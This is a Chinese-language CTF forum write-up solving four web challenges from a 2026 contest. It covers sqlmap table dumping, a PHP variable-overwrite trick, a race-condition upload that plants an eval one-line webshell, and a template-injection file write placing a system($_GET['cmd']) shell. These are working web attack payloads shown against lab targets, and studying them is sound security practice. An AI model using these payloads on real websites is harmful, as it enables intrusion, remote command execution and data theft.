赛博潇湘CTF论坛
    • 注册
    • 登录
    • 搜索
    • 版块
    • 最新
    • 话题
    • 热门
    • 用户
    • Wiki
    • 靶场

    PolarD&N CTF2026春季赛web方向部分题目WP

    Web
    1
    1
    20
    正在加载更多帖子
    • 从旧到新
    • 从新到旧
    • 最多赞同
    回复
    • 在新帖中回复
    登录后回复
    此主题已被删除。只有拥有主题管理权限的用户可以查看。
    • Light_PolarisCN
      Light_PolarisCN 站长 最后由 编辑

      说真的,我不明白,为什么大家都在谈论着web的靶场打不开,烦死了,嬲

      3-1 sql_search
      直接用sqlmap爆出所有的表
      sqlmap -u http:///?search=1 --tables --drop-set-cookie
      4ec3e8e7-8efa-47c2-ab16-67926b0fee5e-image.png
      猜测是在flagggggggg表中
      sqlmap -u http://      /?search=1 -T flaggggggggggg --dump --drop-set-cookie
      b9c2d71f-6d29-458d-92fa-0c16389fa016-image.png

      3-2 The_Gift
      这道题是PHP变量覆盖漏洞。代码中foreach循环使用key=key等价于 $ config['isAdmin']='true',把原对象覆盖为数组。最终判断条件满足,输出Flag。访问/?config[isAdmin]=true即可获取。
      62026c38-eb40-4bc3-b4a0-ccd01f615be5-image.png

      3-3 并发上传
      此题发现一个上传文件的地方,结合题目名字,利用条件竞争
      使用<?php phpinfo(); fputs(fopen('1.php','w'),'<?php phpinfo(); eval($_REQUEST[1]);?>');?>,执行后可以写入一个1.php文件,从而有一句话木马。
      981d6d9b-bfac-4c82-ad6d-f2daa27a24bc-image.png
      利用bp不断上传,不断访问,如下图显示上传成功。
      39948621-8128-4a5b-90aa-56dcedd4669d-image.png
      蚁剑连接后即可
      5acf4f86-26a9-4b01-9389-a25801a9f5a3-image.png

      3-12 新年贺卡
      分析源码可知这是任意文件写入+模板注入导致RCE
      b52dfd51-9f16-4088-9e8e-27b4ffe08e2f-image.png
      直接写入用户提交的内容
      具体操作入下:
      1.访问以下URL获取模板添加表单:
      http:///?action=admin&debug=/%20*/_form
      2.使用curl提交恶意PHP代码:
      curl -X POST "http:///?action=admin&debug=add_template"
      -d "template_name=shell"
      -d "template_content=<?php system($_GET['cmd']); ?>"
      使用此链接执行命令,http://      /templates/shell.php?cmd=cat /flag.txt 即可得到flag

      1 条回复 最后回复 回复 引用 0
      • First post
        Last post
      Powered by NodeBB | Contributors